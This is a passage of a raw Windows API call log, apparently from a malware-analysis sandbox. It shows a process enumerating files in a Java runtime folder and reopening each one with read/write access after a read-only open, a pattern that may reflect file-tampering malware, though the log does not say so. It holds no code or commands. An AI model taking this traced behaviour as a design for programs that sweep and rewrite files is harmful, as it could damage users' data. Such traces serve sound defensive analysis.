InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0093.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.665] AreFileApisANSI () returned 1 [0093.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0093.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76110 [0093.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 55 [0093.665] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.792] GetFileType (hFile=0x360) returned 0x1 [0093.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0093.792] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.793] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.793] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.793] CloseHandle (hObject=0x360) returned 1 [0093.793] AreFileApisANSI () returned 1 [0093.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0093.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75dc8 [0093.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 55 [0093.794] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.794] GetFileType (hFile=0x360) returned 0x1 [0093.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0093.794] CloseHandle (hObject=0x360) returned 1 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.795] AreFileApisANSI () returned 1 [0093.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0093.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75f30 [0093.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 55 [0093.796] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8af971e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0093.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.796] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="server", cAlternateFileName="")) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0093.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0093.797] AreFileApisANSI () returned 1 [0093.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server", lpUsedDefaultChar=0x0) returned 46 [0093.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0093.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0093.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.797] AreFileApisANSI () returned 1 [0093.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0093.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71c38 [0093.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71c38, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server") returned 46 [0093.797] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.797] GetLastError () returned 0x5 [0093.797] GetLastError () returned 0x5 [0093.797] SetLastError (dwErrCode=0x5) [0093.797] GetLastError () returned 0x5 [0093.798] SetLastError (dwErrCode=0x5) [0093.798] GetLastError () returned 0x5 [0093.798] SetLastError (dwErrCode=0x5) [0093.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0093.798] AreFileApisANSI () returned 1 [0093.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0093.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0093.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server") returned 46 [0093.798] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.798] GetLastError () returned 0x5 [0093.798] GetLastError () returned 0x5 [0093.798] SetLastError (dwErrCode=0x5) [0093.798] GetLastError () returned 0x5 [0093.798] SetLastError (dwErrCode=0x5) [0093.798] GetLastError () returned 0x5 [0093.798] SetLastError (dwErrCode=0x5) [0093.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0093.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0093.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0093.799] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0093.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.799] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0093.801] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.801] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x21, ftCreationTime.dwLowDateTime=0xab35b530, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xab35b530, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xabaa88bc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11d0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="classes.jsa", cAlternateFileName="")) returned 1 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0093.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0093.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0093.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0093.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0093.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0093.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.802] AreFileApisANSI () returned 1 [0093.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", lpUsedDefaultChar=0x0) returned 58 [0093.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0093.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0093.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.802] AreFileApisANSI () returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0093.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a5b0 [0093.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 58 [0093.803] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.804] GetFileType (hFile=0x368) returned 0x1 [0093.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0093.804] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.804] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.804] 